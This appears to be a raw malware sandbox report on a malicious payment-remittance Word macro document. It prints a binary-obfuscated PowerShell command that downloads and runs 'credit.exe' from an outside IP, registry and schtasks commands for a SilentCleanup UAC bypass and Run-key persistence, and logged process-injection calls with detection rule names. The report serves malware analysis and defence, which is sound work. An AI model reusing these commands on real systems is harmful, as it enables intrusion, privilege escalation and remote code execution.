 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000454
filepath: C:\Users\test22\AppData\Local\Temp\~$M_Payment_Remittance_505693.docm
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$M_Payment_Remittance_505693.docm
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline Powershell $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110010,00110111,00101110,00110001,00110101,00111000,00101110,00110001,00110001,00110001,00101111,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110010,00110111,00101110,00110001,00110101,00111000,00101110,00110001,00110001,00110001,00101111,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
file C:\Users\test22\AppData\Local\Temp\credit.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: Powershell
parameters: $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110010,00110111,00101110,00110001,00110101,00111000,00101110,00110001,00110001,00110001,00101111,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
filepath: Powershell
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2428
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 94208
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x048c1000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received ;Xuï‹;Xu_‹;x Žœ‹‹×+P ‹‹@‹A L$è5üÿÿƒ|$t3L$T$‹Åèoúÿÿƒ|$uŸL$‹T$ ‹D$èüÿÿ‹$3҉隍L$‹×‹Ãèîûÿÿƒ|$t4L$T$‹Åè(úÿÿƒ|$…TÿÿÿL$‹T$ ‹D$è4üÿÿ‹$3҉ëR‹‹h;ÝuB‹;x ;‹ $‹Å‹×è×üÿÿ‹$ƒ8t.‹$‹@‹B‹$‹@‹)B ‹ƒx u‹è†ùÿÿë‹$3҉ƒÄ]_^[ÐSƒÄè‹Ùˆÿ?áÀÿÿ‰ $ЁâÀÿÿ‰T$‹D$;$v_‹Ë‹T$+$‹$èýÿÿL$‹Ó¸üLè]ùÿÿ‹\$…ÛtL$‹T$ ‹Ãènûÿÿ‹D$‰D$‹D$‰D$ ƒ|$tT$¸üLè©ùÿÿë3À‰ƒÄ[ËÀU‹ìQ3ÒUh @dÿ2d‰"hÌLè¼÷ÿÿ€=MLt hÌLè±÷ÿÿ¸ìLèCøÿÿ¸üLè9øÿÿ¸(Lè/øÿÿhøjè_÷ÿÿ£$Lƒ=$Lt@¸‹$L3ɉL‚ô@=uìÇEü L‹Eü‹Uü‰P‹Eü‹Uü‰‹Eü£LÆÄL3ÀZYYd‰h'@€=MLt hÌLè!÷ÿÿÃéc ëå ÄLY]ÐU‹ìƒÄø€=ÄL„è3ÀUh$@dÿ0d‰ €=MLt hÌLèÔöÿÿÆÄL¡$LPè¢öÿÿ3À£$L¡ìL‰Eøëh€j‹Eø‹@PèŽöÿÿ‹Eø‹‰Eø¸ìL;EøuÛ¸ìLè÷ÿÿ¸üLè÷ÿÿ¸(Lè ÷ÿÿ¡äL‰Eüƒ}üt!‹Eü‹£äL‹EüPè-öÿÿ¡äL‰Eüƒ}üuß3ÀZYYd‰h+@€=MLt hÌLè'öÿÿhÌLè%öÿÿÃé_ëÛYY]ÐSƒÄø;Lu ‹P‰L‹P‰$‹PúN;$u…ÒyƒÂÁú¡$L3ɉLôëK…ÒyƒÂÁú‹ $L‹$‰\‘ô‹‰D$‹$‹T$‰‹D$‹$‰P닉D$‹$‹T$‰‹D$‹$‰PYZ[Í@SQ‹Ì‹(L‰ë‹‹R;Âr ‹S ;Âr‹‹‰º(L;ußÇÈL3À‰‹Z[ËÀSQ‹Êƒé‰$ƒú|‹$Ç€‹ÑèÚZ[Ãú|‹ÊÉ€‰‹$‰Z[Ãÿ´L‹Ðƒê‹âüÿÿƒê¸LèûËÀƒú |ƒÊ‰ƒÀèÊÿÿÿÃú| ‹ÊÉ€‰ƒ þÃSVQ‹Ðƒê‹‹Êá€ù€t ÇÈL‹Úãüÿÿ+ËÈ3÷Âþÿÿÿt ÇÈLöt)‹Ðƒê ‹r+Ɖ$‹$;pt ÇÈL‹$è0þÿÿދÃZ^[ÃSVQ‹Ø3ö‹©€t %üÿÿð؋¨u‰$‹$èþýÿÿ‹$‹@ð؃#þ‹ÆZ^[Í@SVWUƒÄô‹ò‹è3ۋÅèhþÿÿ‰D$ƒ|$„‹D$‹x‹Ç‹T$B ‹Ð .+уú ‹ð+õ‹Å+ǃø }‹D$‹Õ+P֋̋Çèûÿÿë‹Ì‹ÖƒêEè ûÿÿ‹<$…ÿt:‹×+ՋÅè=þÿÿ‹T$‹R‹L$Q ‹ÇD$;Ðv .+Ðè{þÿÿ‹Ô‹D$èüôÿÿ³‹ÃƒÄ ]_^[ÃSVƒÄô‹Ú‹ð‰4$‹$‰X‹$Ãƒè ‰Xûv‹Ã…ÀyƒÀÁø‹$L‹T‚ô‰T$ƒ|$u#‹$L‹ $‰L‚ô‹$‹$‰P‹$‹$‰鈋D$‹‰D$‹$‹T$‰P‹$‹
Data received þ€StyleüHDaÿ°ŽDLD€AnchorsA_ÿpþ¨œD€€BiDiModeŒ=CtÿtœC€CharCase@`Bpÿ$D@D€ÿColor¤IDtÿ¤ÀD€€ Constraints@¥ÿ\E€E€€Ctl3D<ADzÿzÿ€ôÿÿÿ DragCursorXHD›ÿ›ÿ€DragKindÐGD]ÿ`þ€DragModeT@ÿþ€ DropDownCount@Pþdþì»D€EnabledàdBhÿxœDˆœD€€FontÔVD„ÿ„ÿ€ImeModedWDˆÿˆÿ€€ ImeNameT@üþþ€€! ItemHeightT@ÌþÐþ€ÿÿÿÿ" ItemIndexT@ ÿLšC€# MaxLength@`ÿlþ€$ParentBiDiMode@ZÿHD€% ParentColor@©ÿŒE€& ParentCtl3D@Yÿ°œD€' ParentFont@šÿøœD€(ParentShowHintX˜E|ÿ<›D€€) PopupMenu@™ÿԜDœœD€€*ShowHint@uÿ¦C€+SortedŒHD¸E8E€ÿÿÿÿ,TabOrder@¤ÿPE€-TabStop¤HD„›D´›D€€.Text@Wÿ¤šDL¼D€/VisibleؑAÿÿ€€0OnChangeؑA ÿ ÿl¼D€€1OnClickؑA0ÿ0ÿ€€2 OnCloseUpˆQD0ÿ0ÿ€€3OnContextPopupؑA(ÿ(ÿ€€4 OnDblClickLLDèÿèÿ€€5 OnDragDropÄKDðÿðÿ€€6 OnDragOver¬SC€ÿ€ÿ€€7 OnDrawItemؑA(ÿ(ÿ€€8 OnDropDownôLDÿÿ€€9 OnEndDockôLDÿÿ€€: OnEndDragؑAÀÿÀÿ€€;OnEnterؑAÈÿÈÿ€€<OnExit<KDØÿØÿ€€= OnKeyDownˆKDàÿàÿ€€> OnKeyPress<KDèÿèÿ€€?OnKeyUpTCˆÿˆÿ€€@ OnMeasureItemؑA ÿ ÿ€€AOnSelect´NDÿÿ€€B OnStartDock¬LDÿÿ€€C OnStartDragxA<ÿ þ€€DItemsØcCTdC,ôUD<8@H8@L8@P8@D8@x5@”5@tQB´C¨QBÀŠDÜQBl‹D,QBÀQBRB¬‰D,´C ŠDÌfEèÁD˜‹DTŠDgE0gEŒŠDXgEèŠDd´C‹DhgEðÁDü‹D<ŒD(‹D|gE€gEL‹D¼ˆDTButtonActionLink‹À´dC´eC„eCžeC ÈXDˆPBH8@¸IBP8@\àDx5@”5@(ÃDðE$ØDØÈAŒ¼D,DÐÄDl™D PBdMB\MB¨PBÈ´C E ElE ŽDÄEäEÄEèDìD\¾Dˆ¾DT™DdDàšDXšDlDœDtµC ¿DPE EÐþDðEHÅDÜËD„ÙDd¶ClÖDœÔDÚD ÚDØØD€ØD0EÈâDàEtEœElµCpµC8½ïÿÙÿìµC8¶CµCdµCTButtonControl@´eCTButtonControl´dC|\D StdCtrls@(fC<gCüfC.gChdCˆPBH8@¸IBP8@\àDx5@”5@(ÃDðE$ØDØÈAŒ¼D,DÐÄDl™D PBdMB\MB¨PBœ¶C E ElE ŽDÄEäEÄEèDìD\¾Dˆ¾DT™DdDàšDXšDlDœDtµC ¿DPE EÐþDðEHÅDÜËD„ÙD°·ClÖDì·CÚD ÚDØØD€ØD0EÈâDàEtEœElµCpµC(·C°°°½5½ëÿÈÿ¸Cˆ¸C ¹C¸CŒ¹C`¹C·C$·CTButton‹À<gCTButton(fC°eC1StdCtrls&à¨A<þЎD€€ ActionüHDaÿ°ŽDLD€ AnchorsA_ÿpþ¨œD€€ BiDiMode@ÿÿ€Cancel¤HD„›D´›DÌ»D€€Caption¤IDtÿ¤ÀD€€ Constraints@ÿ|·C€Default<ADzÿzÿ€ôÿÿÿ DragCursorXHD›ÿ›ÿ€DragKindÐGD]ÿ`þ€DragMode@Pþdþì»D€EnabledàdBhÿxœDˆœD€€Font ADÿÿ€ ModalResult@`ÿlþ€ParentBiDiMode@Yÿ°œD€ ParentFont@šÿøœD€ParentShowHintX˜E|ÿ<›D€€ PopupMenu@™ÿԜDœœD€€ShowHintŒHD¸E8E€ÿÿÿÿTabOrder@¤ÿPE
Data received €TabStop@Wÿ¤šDL¼D€Visible@ ÿˆ¶C€ WordWrapؑA ÿ ÿl¼D€€!OnClickˆQD0ÿ0ÿ€€"OnContextPopupLLDèÿèÿ€€# OnDragDropÄKDðÿðÿ€€$ OnDragOverôLDÿÿ€€% OnEndDockôLDÿÿ€€& OnEndDragؑAÀÿÀÿ€€'OnEnterؑAÈÿÈÿ€€(OnExit<KDØÿØÿ€€) OnKeyDownˆKDàÿàÿ€€* OnKeyPress<KDèÿèÿ€€+OnKeyUp`JDÐÿÐÿ€€, OnMouseDownØJDØÿØÿ€€- OnMouseMove`JDàÿàÿ€€. OnMouseUp´NDÿÿ€€/ OnStartDock¬LDÿÿ€€0 OnStartDrag°lC TListBoxStyle¬lC lbStandardlbOwnerDrawFixedlbOwnerDrawVariable lbVirtuallbVirtualOwnerDrawStdCtrls‹À(mCTLBGetDataEventControl TWinControlIndexIntegerDataString|\DT@Ü@@€mCTLBGetDataObjectEve
Data sent GET /credit.exe HTTP/1.1 Host: 192.227.158.111 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
cmdline reg delete hkcu\Environment /v windir /f
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
buffer Buffer with sha1: 06d100b6739d81d24681303d479d1c3f0c3141e6
host 192.227.158.111
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 507904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10590000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00110000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00010000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00020000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00130000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00140000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00150000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00160000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Boplulw reg_value C:\Users\Public\Libraries\wlulpoB.url
file C:\Users\test22\AppData\Local\Temp\credit.exe
Process injection Process 2428 created a remote thread in non-child process 2808
Time & API Arguments Status Return Repeated

CreateRemoteThread

 thread_identifier: 2844
process_identifier: 2808
function_address: 0x000b0000
flags: 0
stack_size: 0
parameter: 0x00000000
process_handle: 0x00000198
1 1368 0

CreateRemoteThread

 thread_identifier: 2848
process_identifier: 2808
function_address: 0x00020000
flags: 0
stack_size: 0
parameter: 0x00010000
process_handle: 0x00000198
1 1368 0

CreateRemoteThread

 thread_identifier: 2852
process_identifier: 2808
function_address: 0x00160000
flags: 0
stack_size: 0
parameter: 0x00150000
process_handle: 0x00000198
1 1364 0

CreateRemoteThread

 thread_identifier: 2856
process_identifier: 2808
function_address: 0x00200000
flags: 0
stack_size: 0
parameter: 0x001f0000
process_handle: 0x00000198
1 1372 0
Process injection Process 2428 manipulating memory of non-child process 2808
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 507904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10590000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00110000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00010000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00020000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00130000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00140000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00150000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00160000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000198
1 0 0
Process injection Process 2428 injected into non-child 2808
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: h ÿ hÿ ×Iu˜Õwkernel32.dllÿ0ûEPúE¾tt€úE™Étpý~dúElatQyt#pý~€úE:‰t6;t ûEmØtØúEØúEÿÿÿÿDûE0ûE?Œÿ$Œ ûE,%ŒèúEü€ ü ûEQAYATûEäEŒ
base_address: 0x000b0000
process_identifier: 2808
process_handle: 0x00000198
1 1 0

WriteProcessMemory

 buffer: GetProcAddress
base_address: 0x000c0000
process_identifier: 2808
process_handle: 0x00000198
1 1 0

WriteProcessMemory

 buffer: kernel32.dll
base_address: 0x00110000
process_identifier: 2808
process_handle: 0x00000198
1 1 0

WriteProcessMemory

 buffer: ˜Õw"uEu
base_address: 0x00010000
process_identifier: 2808
process_handle: 0x00000198
1 1 0

WriteProcessMemory

 buffer: U‹ìƒÄìVW‹E‹ð}쥥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^‹å]‹ÀU‹ìƒÄàSVW‹ù‰Uü‹Ø‹u3À‰EøhÄIhØIèEÿÿPèGÿÿ‰EèhèIhØIè-ÿÿPè/ÿÿ‰EähøIhØIèÿÿPèÿÿ‰Eàƒþu‰}ðë‹Î‹×‹ÃèGüÿÿ‰Eð‹Uü‹Ãè¢ûÿÿ‰EìjjMàºÐH‹Ãè`üÿÿ‹Ø…ÛtjÿSè¦ÿÿEôPSè„ÿÿ‹Eô‰Eø‹Eø_^[‹å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadU‹ìƒÄìS‰Eü‹Eü‰Eø‹E‹@ü‹€¤‰EôëU‹Eø‹@ƒèÑè‰Eì‹EøƒÀ‰Eð‹UìJ…Òr0B‹Eðf‹öÅðt‹E‹@ô‹]øfáÿ·ÉÁ‹M‹IøƒEðJuыEð‰Eø‹Eø+Eü;Eôr [‹å]Ã
base_address: 0x00020000
process_identifier: 2808
process_handle: 0x00000198
1 1 0

WriteProcessMemory

 buffer: LoadLibraryA
base_address: 0x00130000
process_identifier: 2808
process_handle: 0x00000198
1 1 0

WriteProcessMemory

 buffer: kernel32.dll
base_address: 0x00140000
process_identifier: 2808
process_handle: 0x00000198
1 1 0

WriteProcessMemory

 buffer: ˜Õw"uEu
base_address: 0x00150000
process_identifier: 2808
process_handle: 0x00000198
1 1 0

WriteProcessMemory

